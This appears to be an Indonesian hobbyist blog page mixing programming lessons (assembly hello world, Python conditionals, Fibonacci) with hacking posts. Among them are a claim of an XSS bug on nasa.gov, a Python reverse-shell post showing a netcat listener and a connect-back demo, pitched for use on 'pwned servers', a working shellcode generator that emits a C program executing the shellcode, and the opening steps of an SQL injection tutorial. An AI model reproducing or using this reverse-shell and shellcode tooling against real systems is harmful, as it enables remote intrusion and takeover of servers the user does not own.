update kernel ubuntu 10.04

update kernel baru:
1. download:

http://kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.34-lucid/linux-source-2.6.34_2.6.34-020634_all.deb

http://kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.34-lucid/linux-image-2.6.34-020634-generic_2.6.34-020634_i386.deb

http://kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.34-lucid/linux-headers-2.6.34-020634_2.6.34-020634_all.deb

http://kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.34-lucid/linux-headers-2.6.34-020634-generic_2.6.34-020634_i386.deb

2.simpan ke folder misal ~/Desktop/kernel/
Read more of this post

XSS in www.nasa.gov

aje gile ternyata di web nasa masih terdapat bug XSS(Cross Site Scripting)
check it:
XSS nasa

weleh weleh…

simple hello world asm32

sedikit kisah tentang belajar assembly 32 bit di lingkungan linux:

section .data
pesan db "Hello world",10 ; variable pesan berisi "Hello world" dan diakhiri nilai 10 yaitu newline
len equ $-pesan ; panjang string adalah mengurangi address di baris ini dengan alamat string

section .text

global _start

_start:

mov edx,11 ; panjang string dimasukkan register edx
mov ecx,pesan ; alamat memory yang menyimpan string dimasukkan ke dalam register ecx
mov ebx,1 ; 1 adalah stdout
mov eax,4 ;syscall 4 adalah sys_write()
int 0x80 ; interup untuk eksekusi

xor ebx, ebx ; memberi nilai 0 pada ebx setelah bernilai 1, nilai default adalah 0
mov eax,1 ; syscall exit
int 0x80

compiling, linking dan eksekusi

akfsec@Indonesia:~/program/asm32$ nasm -f elf helloworld.asm
akfsec@Indonesia:~/program/asm32$ ld -o helloworld helloworld.o
akfsec@Indonesia:~/program/asm32$ ./helloworld
Hello world

reverse shell written in python

sedikit hasil coding dengan cara seksama dan dalam tempo yang sesingkat2nya 🙂 , reverse shell, bisa digunakan dan dikembangkan sebagai alternatif jika bertemu pwned server yang didisable untuk php shell 🙂

untuk penggunaanya disiapkan dulu listening port nya, misal:

nc -l 12345

contoh penggunaan:
di box kita:

r3dsh4d0w@deepmind:~$ nc -l 12345

di box yang mengeksekusi reverseshell:

akfsec@Indonesia:~/program/python$ id
uid=1000(akfsec) gid=1000(akfsec) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(akfsec)
akfsec@Indonesia:~/program/python$ ./reverseshell.py 192.168.1.2 12345

hasil di box listen:

r3dsh4d0w@deepmind:~$ nc -l 12345
w00t!!, succesfully connected
please wait while getting the prompt
Enjoy dude...
id    
uid=1000(akfsec) gid=1000(akfsec) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(akfsec)

untuk sourcenya:
Read more of this post

shellcode maker written in python

hello world… iseng iseng cari referensi tentang shellcoding, eh.. akhirnya mengisengkan diri untuk membuat program untuk otomatisasi membuat shellcode dari source.asm, berikut sourcecodenya, silahkan dikembangkan…

#!/usr/bin/env python
import os, sys, time
os.system("clear")
def banner():
    print "###################################################################"
    print "___________________________________________________________________"
    print "________/__\_|_|__/__//_______/__________________|__|______________"
    print "_______/___ \|_|_/__//__/_____/_____/_/_____\____|__|_/_____\______"
    print "______/__/\__|_|/__//______\_/__/____/__/\___\/_____|/______/______"
    print "_____/__/__\_|___<__\__\_____\__\____\__\/___/__/___|__<___________"
    print "____(________|_|\__\_\__\_____\_____\_\_____/\_______\_____\_______"
    print "_____________\_|_\__\_\__\_________________________________________"
    print "______________\/__\__\_________shellcode generator v.1_____________"
    print "_______________________________coder: -AKF-________________________"
    print "_______________________________requirements: linux, nasm, gcc______"
    print "_______________________________target : intel-32___________________"
    print "___________________________________________________________________"
    print "###################################################################"

if len(sys.argv) <= 1:
    banner()
    print "[+]usage: ./" + sys.argv[0] + " source.asm"   
    print "[+]ex: ./" + sys.argv[0] + " testshell.asm"
    sys.exit(1)

banner()
akf = sys.argv[1]
egg = akf[:-4]
greenblack="nasm -f elf " + akf
dop="ld -o egg"+ " " + egg + ".o"
print "[+]please wait while processing your program"
os.system(greenblack)
time.sleep(3)
print "[+]almost D0ne..."
os.system(dop)
time.sleep(3)	
print "[+]D0ne!!, the shellcode is:"
print ""
print "<-------save the code below in .c-------->"
print ""
print "//shellcode generator v.1"
print "//coder: -AKF- a.k.a redshadow"
print "//underattacks security research"
print "//akfcode"
print "#include <stdio.h>"
print "char shellcode[]="
minal = "egg"
lakov = "objdump -d ./"
qolbu = "|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's/ $//g'|sed 's/ /\\\\x/g'|paste -d '' -s |sed 's/^/\"/'|sed 's/$/\"/g'"
likov = lakov+minal+qolbu
os.system(likov)
print ";"
print "int main(void) {"
print "((void (*)(void))shellcode)();"
print "return 0;"
print "}"
print ""
print "<----------------- EOF ------------------->"
print ""
print "[+]thanks for using!!!"
brengos = "rm egg"
masje = "rm " + egg + ".o"
os.system(brengos)
os.system(masje)

dan berikut contoh penggunaanya:
Read more of this post

register untuk prosesor intel arsitek 32 bit

wah, ini sedikit sharing berhubung saya sedang belajar bahasa assembly khususnya 32 bit untuk prosesor intel, dengan assemblernya adalah nasm, kali ini adalah tentang register, yang saya baca dari berbagai referensi:

berikut skemanya:

register sendiri merupakan variable yang sudah terinclude ke dalam prosesor, sehingga programmer bisa menggunakannya dalam berbagai keperluan, wah.. segitu dulu ya, saya bingung menulisaknnya 😀

semoga bermanfaat

-AKF-

cara cepat melakukan SQL injection mysql v.5

SQL injection merupakan sebuah tehnik hacking yang paling banyak digunakan, karena dari sebuah bug yang dilakukan seorang programmer dimana terdapat bug SQLi ini bukannya tidak mungkin sebuah server akan dapat dikuasai oleh attacker, untuk lebih jelas tentang apakah SQLi ini silahkan search di google, baik langsung saja untuk melakukan SQLi ini tentu saya sebuah target yang vulnerable terhadap SQLi dan langkah – langkahnya adalah sebagai berikut

1. test bug
bisa dilakukan dengan memberikan single quote(petik tunggal) pada url yang terdapat bug, contoh url adalah http://target.com/menu.php?id=1 , maka berikan single quote dibelakangnya sehingga menjadi:

http://target.com/menu.php?id=1'

Read more of this post

baner sederhana

contoh:

#!/usr/bin/env python
print "###################################################################"
print "___________________________________________________________________"
print "________/__\_|_|__/__//_______/__________________|__|______________"
print "_______/___ \|_|_/__//__/_____/_____/_/_____\____|__|_/_____\______"
print "______/__/\__|_|/__//______\_/__/____/__/\___\/_____|/______/______"
print "_____/__/__\_|___<__\__\_____\__\____\__\/___/__/___|__<___________"
print "____(________|_|\__\_\__\_____\_____\_\_____/\_______\_____\_______"
print "_____________\_|_\__\_\__\_________________________________________"
print "______________\/__\__\_____________________________________________"
print "___________________________________________________________________"
print "###################################################################"

deret fibonacci di python

yo yo yo…
setelah kemarin memposting tentang deret fibonacci dan beberapa postingan tentang dasar pemrograman python, eh.. iseng deh kepingin bikin program sederhana untuk menampilkan deret fibonacci, kekeekeke..
alhasil jadi deh.. berikut source codenya, mungkin bisa dikembangkan lebih lanjut:

#!/usr/bin/env python
import os, sys
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
  hapus = "clear"
if sys.platform == 'win32':
  hapus = "cls"
print "deret fibonacci in python"
jumlah = raw_input("masukkan jumlah anggota deret yang diinginkan: ")
a=int(jumlah)    
if a == 0:
   print "anda salah memasukkan angka!!"
elif a == 1:
   print "-----------deret fibonaccinya adalah-------------------"
   print "[0]"
   print "-------------------------------------------------------"
elif a == 2:
   print "-----------deret fibonaccinya adalah-------------------"
   print "[0,1]"
   print "-------------------------------------------------------"
else:
   fibonacci = [0,1]
   #x = int(a)
   q = (a - 1)
for i in range(1,q):
   x = int(fibonacci[-1])
   y = int(fibonacci[-2])
   z = x+y
   fibonacci.append(z)
   os.system(hapus)
   print "-----------deret fibonaccinya adalah-------------------"
   print fibonacci
   print "-------------------------------------------------------"

semoga bermanfaat

-AKF-

percabangan di python(1)

percabangan dalam bahasa pemrograman sama halnya dengan bagaimana mengambil keputusan untuk melakukan sesuatu, ketika menghadapi suatu kondisi tertentu, atau menghadapi suatu pilihan, di dalam python penulisan untuk percabangan adalah dengan menggunakan statemen if dengan susunan sebagai berikut

1.jenis pertama:

if kondisi:
   baris perintah

2.jenis kedua

if kondisi pertama:
   perintah
elif kondisi kedua:
   perintah
elif kondisi n:
   perintah

3.jenis ketiga:

if kondisi:
   perintah
elif kondisi kedua:
   perintah
elif kondisi ke n:
   perintah
else:
   perintah jka tidak ditemukan kondisi yang cocok

berikut adalah contoh program sederhana untuk lebih membantu:

#!/usr/bin/env python
angka=raw_input("masukkan sebuah angka positif: ")
bilangan=int(angka)
if bilangan <= 10:
	print "angka kurang dari sepuluh"
elif bilangan >=10 and bilangan <=50:
	print "bilangan lebih dari sepuluh tetapi kurang dari lima puluh"
else:
	print "bilangan lebih dari lima puluh"

baiklah, semoga bermanfaat

-AKF-